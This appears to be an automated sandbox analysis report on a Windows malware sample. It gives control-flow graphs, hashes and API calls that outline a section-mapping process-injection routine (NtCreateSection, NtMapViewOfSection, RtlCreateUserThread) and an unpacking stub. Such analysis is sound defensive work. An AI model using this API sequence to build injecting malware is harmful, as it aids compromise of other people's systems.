                                                                                    • API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
                                                                                    • String ID: k`$}$
                                                                                    • API String ID: 87775671-956986773
                                                                                    • Opcode ID: af848128e07c8e7bc8c1a283e971220105452b3befcdffc31dcb9ba888bf08ed
                                                                                    • Instruction ID: 345bacdf8fa8409494645b8175c494f1eca766bbd4a7b31c038ebc0919f88a2f
                                                                                    • Opcode Fuzzy Hash: af848128e07c8e7bc8c1a283e971220105452b3befcdffc31dcb9ba888bf08ed
                                                                                    • Instruction Fuzzy Hash: 3AB1C471901124ABCB209B65EC54BDF7B79EF49354F00806EF609A3161DB385E85CFAE

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 70 4014db-4014e7 71 401486-40148b 70->71 72 4014e9 70->72 73 401550-401569 72->73 74 4014eb 72->74 79 40155d-40156c call 4011a4 73->79 76 40155a 74->76 77 4014ed-4014fb 74->77 76->79 82 40149a-4014a8 77->82 83 4014fd-4014ff 77->83 86 40156e-40157f 79->86 87 4014c1-4014c8 82->87 85 401501 83->85 83->86 90 401504-401518 85->90 91 40148f 85->91 88 401581 86->88 89 401584-401589 86->89 92 401469-401485 call 4011a4 87->92 93 4014ca 87->93 88->89 100 4018a6-4018ae 89->100 101 40158f-4015a0 89->101 90->87 94 40151a 90->94 91->82 92->71 93->70 97 401539-401555 94->97 98 40151c-401526 94->98 97->73 100->89 108 4018a4-4018b3 101->108 109 4015a6-4015cf 101->109 111 4018c8 108->111 112 4018b9-4018c4 108->112 109->108 117 4015d5-4015ec NtDuplicateObject 109->117 111->112 114 4018cb-4018ff call 4011a4 111->114 112->114 117->108 119 4015f2-401616 NtCreateSection 117->119 121 401672-401698 NtCreateSection 119->121 122 401618-401639 NtMapViewOfSection 119->122 121->108 126 40169e-4016a2 121->126 122->121 125 40163b-401657 NtMapViewOfSection 122->125 125->121 127 401659-40166f 125->127 126->108 129 4016a8-4016c9 NtMapViewOfSection 126->129 127->121 129->108 130 4016cf-4016eb NtMapViewOfSection 129->130 130->108 132 4016f1 call 4016f6 130->132
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$CreateDuplicateObjectView
                                                                                    • String ID: 1
                                                                                    • API String ID: 1652636561-2212294583
                                                                                    • Opcode ID: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                    • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                    • Opcode Fuzzy Hash: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                    • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 221 401529-401532 222 401543 221->222 223 401539-40153f 221->223 222->223 224 401546-40157f call 4011a4 222->224 223->224 234 401581 224->234 235 401584-401589 224->235 234->235 237 4018a6-4018ae 235->237 238 40158f-4015a0 235->238 237->235 241 4018a4-4018b3 238->241 242 4015a6-4015cf 238->242 244 4018c8 241->244 245 4018b9-4018c4 241->245 242->241 250 4015d5-4015ec NtDuplicateObject 242->250 244->245 247 4018cb-4018ff call 4011a4 244->247 245->247 250->241 252 4015f2-401616 NtCreateSection 250->252 254 401672-401698 NtCreateSection 252->254 255 401618-401639 NtMapViewOfSection 252->255 254->241 259 40169e-4016a2 254->259 255->254 258 40163b-401657 NtMapViewOfSection 255->258 258->254 260 401659-40166f 258->260 259->241 262 4016a8-4016c9 NtMapViewOfSection 259->262 260->254 262->241 263 4016cf-4016eb NtMapViewOfSection 262->263 263->241 265 4016f1 call 4016f6 263->265
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                    • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                    • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                    • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 269 401534-40157f call 4011a4 280 401581 269->280 281 401584-401589 269->281 280->281 283 4018a6-4018ae 281->283 284 40158f-4015a0 281->284 283->281 287 4018a4-4018b3 284->287 288 4015a6-4015cf 284->288 290 4018c8 287->290 291 4018b9-4018c4 287->291 288->287 296 4015d5-4015ec NtDuplicateObject 288->296 290->291 293 4018cb-4018ff call 4011a4 290->293 291->293 296->287 298 4015f2-401616 NtCreateSection 296->298 300 401672-401698 NtCreateSection 298->300 301 401618-401639 NtMapViewOfSection 298->301 300->287 305 40169e-4016a2 300->305 301->300 304 40163b-401657 NtMapViewOfSection 301->304 304->300 306 401659-40166f 304->306 305->287 308 4016a8-4016c9 NtMapViewOfSection 305->308 306->300 308->287 309 4016cf-4016eb NtMapViewOfSection 308->309 309->287 311 4016f1 call 4016f6 309->311
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                    • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                    • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                    • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 315 401541-401543 317 401546-40157f call 4011a4 315->317 318 401539-40153f 315->318 328 401581 317->328 329 401584-401589 317->329 318->317 328->329 331 4018a6-4018ae 329->331 332 40158f-4015a0 329->332 331->329 335 4018a4-4018b3 332->335 336 4015a6-4015cf 332->336 338 4018c8 335->338 339 4018b9-4018c4 335->339 336->335 344 4015d5-4015ec NtDuplicateObject 336->344 338->339 341 4018cb-4018ff call 4011a4 338->341 339->341 344->335 346 4015f2-401616 NtCreateSection 344->346 348 401672-401698 NtCreateSection 346->348 349 401618-401639 NtMapViewOfSection 346->349 348->335 353 40169e-4016a2 348->353 349->348 352 40163b-401657 NtMapViewOfSection 349->352 352->348 354 401659-40166f 352->354 353->335 356 4016a8-4016c9 NtMapViewOfSection 353->356 354->348 356->335 357 4016cf-4016eb NtMapViewOfSection 356->357 357->335 359 4016f1 call 4016f6 357->359
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                    • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                    • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                    • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 363 401545-40157f call 4011a4 371 401581 363->371 372 401584-401589 363->372 371->372 374 4018a6-4018ae 372->374 375 40158f-4015a0 372->375 374->372 378 4018a4-4018b3 375->378 379 4015a6-4015cf 375->379 381 4018c8 378->381 382 4018b9-4018c4 378->382 379->378 387 4015d5-4015ec NtDuplicateObject 379->387 381->382 384 4018cb-4018ff call 4011a4 381->384 382->384 387->378 389 4015f2-401616 NtCreateSection 387->389 391 401672-401698 NtCreateSection 389->391 392 401618-401639 NtMapViewOfSection 389->392 391->378 396 40169e-4016a2 391->396 392->391 395 40163b-401657 NtMapViewOfSection 392->395 395->391 397 401659-40166f 395->397 396->378 399 4016a8-4016c9 NtMapViewOfSection 396->399 397->391 399->378 400 4016cf-4016eb NtMapViewOfSection 399->400 400->378 402 4016f1 call 4016f6 400->402
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                    • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                    • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                    • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 406 401553-40157f call 4011a4 413 401581 406->413 414 401584-401589 406->414 413->414 416 4018a6-4018ae 414->416 417 40158f-4015a0 414->417 416->414 420 4018a4-4018b3 417->420 421 4015a6-4015cf 417->421 423 4018c8 420->423 424 4018b9-4018c4 420->424 421->420 429 4015d5-4015ec NtDuplicateObject 421->429 423->424 426 4018cb-4018ff call 4011a4 423->426 424->426 429->420 431 4015f2-401616 NtCreateSection 429->431 433 401672-401698 NtCreateSection 431->433 434 401618-401639 NtMapViewOfSection 431->434 433->420 438 40169e-4016a2 433->438 434->433 437 40163b-401657 NtMapViewOfSection 434->437 437->433 439 401659-40166f 437->439 438->420 441 4016a8-4016c9 NtMapViewOfSection 438->441 439->433 441->420 442 4016cf-4016eb NtMapViewOfSection 441->442 442->420 444 4016f1 call 4016f6 442->444
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                    • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                    • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                    • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 449 402ffa-40301e 450 403024-40303c 449->450 451 40313d-403142 449->451 450->451 452 403042-403053 450->452 453 403055-40305e 452->453 454 403063-403071 453->454 454->454 455 403073-40307a 454->455 456 40309c-4030a3 455->456 457 40307c-40309b 455->457 458 4030c5-4030c8 456->458 459 4030a5-4030c4 456->459 457->456 460 4030d1 458->460 461 4030ca-4030cd 458->461 459->458 460->453 462 4030d3-4030d8 460->462 461->460 463 4030cf 461->463 462->451 464 4030da-4030dd 462->464 463->462 464->451 465 4030df-40313a RtlCreateUserThread NtTerminateProcess 464->465 465->451
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                    • String ID:
                                                                                    • API String ID: 1921587553-0
                                                                                    • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                    • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                    • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                    • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 466 830572-83058b 467 83058d-83058f 466->467 468 830591 467->468 469 830596-8305a2 CreateToolhelp32Snapshot 467->469 468->469 470 8305b2-8305bf Module32First 469->470 471 8305a4-8305aa 469->471 472 8305c1-8305c2 call 830231 470->472 473 8305c8-8305d0 470->473 471->470 476 8305ac-8305b0 471->476 477 8305c7 472->477 476->467 476->470 477->473
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0083059A
                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 008305BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761888720.000000000082D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_82d000_3312.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 3833638111-0
                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction ID: d3e869c47d3cf8c0250670bf5f8b2e1229a070a0b25b61cdfbb8766f33bf2d36
                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction Fuzzy Hash: 65F06D326017156BDB202AF9A89DB6E76ECFF89765F100529E646E10C0DBB0EC458EA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 136 6a003c-6a0047 137 6a0049 136->137 138 6a004c-6a0263 call 6a0a3f call 6a0e0f call 6a0d90 VirtualAlloc 136->138 137->138 153 6a028b-6a0292 138->153 154 6a0265-6a0289 call 6a0a69 138->154 156 6a02a1-6a02b0 153->156 158 6a02ce-6a03c2 VirtualProtect call 6a0cce call 6a0ce7 154->158 156->158 159 6a02b2-6a02cc 156->159 165 6a03d1-6a03e0 158->165 159->156 166 6a0439-6a04b8 VirtualFree 165->166 167 6a03e2-6a0437 call 6a0ce7 165->167 168 6a04be-6a04cd 166->168 169 6a05f4-6a05fe 166->169 167->165 172 6a04d3-6a04dd 168->172 173 6a077f-6a0789 169->173 174 6a0604-6a060d 169->174 172->169 176 6a04e3-6a0505 172->176 177 6a078b-6a07a3 173->177 178 6a07a6-6a07b0 173->178 174->173 179 6a0613-6a0637 174->179 187 6a0517-6a0520 176->187 188 6a0507-6a0515 176->188 177->178 180 6a086e-6a08be LoadLibraryA 178->180 181 6a07b6-6a07cb 178->181 182 6a063e-6a0648 179->182 186 6a08c7-6a08f9 180->186 184 6a07d2-6a07d5 181->184 182->173 185 6a064e-6a065a 182->185 189 6a07d7-6a07e0 184->189 190 6a0824-6a0833 184->190 185->173 191 6a0660-6a066a 185->191 192 6a08fb-6a0901 186->192 193 6a0902-6a091d 186->193 194 6a0526-6a0547 187->194 188->194 195 6a07e2 189->195 196 6a07e4-6a0822 189->196 198 6a0839-6a083c 190->198 197 6a067a-6a0689 191->197 192->193 199 6a054d-6a0550 194->199 195->190 196->184 200 6a068f-6a06b2 197->200 201 6a0750-6a077a 197->201 198->180 202 6a083e-6a0847 198->202 204 6a05e0-6a05ef 199->204 205 6a0556-6a056b 199->205 206 6a06ef-6a06fc 200->206 207 6a06b4-6a06ed 200->207 201->182 208 6a084b-6a086c 202->208 209 6a0849 202->209 204->172 212 6a056f-6a057a 205->212 213 6a056d 205->213 210 6a074b 206->210 211 6a06fe-6a0748 206->211 207->206 208->198 209->180 210->197 211->210 216 6a059b-6a05bb 212->216 217 6a057c-6a0599 212->217 213->204 220 6a05bd-6a05db 216->220 217->220 220->199
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006A024D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761506014.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a0000_3312.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: cess$kernel32.dll
                                                                                    • API String ID: 4275171209-1230238691
                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction ID: edfa6b35737d46774f892f9e838a511c53124eeea6e349ba935a860513cbf214
                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction Fuzzy Hash: 0A526874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 448 4183f0-418530 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00513D70), ref: 004184CF
                                                                                    • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041850C
                                                                                    • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 0041852B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761335489.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_40b000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2099061454-3916222277
                                                                                    • Opcode ID: 0211fdc64f03efc72d4e260aedab5929f5d5dea431bc9e9a5fc3155d62cc35c4
                                                                                    • Instruction ID: 128802b458cc4b351c6b63df09879892f332cdb2aba605945024bc9f97aa87a6
                                                                                    • Opcode Fuzzy Hash: 0211fdc64f03efc72d4e260aedab5929f5d5dea431bc9e9a5fc3155d62cc35c4
                                                                                    • Instruction Fuzzy Hash: 08316F18508780CAE301DB79FC257823FAAAB75744F04D1ACD54C8B3B1D7BA1618E36E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 479 6a0e0f-6a0e24 SetErrorMode * 2 480 6a0e2b-6a0e2c 479->480 481 6a0e26 479->481 481->480
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,006A0223,?,?), ref: 006A0E19
                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,006A0223,?,?), ref: 006A0E1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761506014.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a0000_3312.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction ID: a812bd8a4e5226da291cda7890492f087020d928e330f1a56def5d4e73e5cff5
                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction Fuzzy Hash: 90D0123114512877DB003A94DC09BCD7B1CDF09B62F008451FB0DD9180C770994046E5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 482 40190e-40190f 483 401912-401963 call 4011a4 Sleep call 401426 482->483 484 4018b5-4018ff call 4011a4 482->484 507 401972-401978 483->507 508 401965-40196d call 401529 483->508 511 40198e 507->511 512 40197f-40198a 507->512 508->507 511->512 513 401991-4019bd call 4011a4 511->513 512->513
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761315277.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_3312.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                    • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                    • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                    • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 521 830231-83026b call 830544 524 8302b9 521->524 525 83026d-8302a0 VirtualAlloc call 8302be 521->525 524->524 527 8302a5-8302b7 525->527 527->524
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00830282
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761888720.000000000082D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_82d000_3312.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction ID: 3b90be4db438cabf248739df59b478c1ec59edaa163146ab298285ce5bcc87a1
                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction Fuzzy Hash: 0F112B79A00208EFDB01DF98C985E99BBF5EF08351F058094FA489B362D371EA90DF80

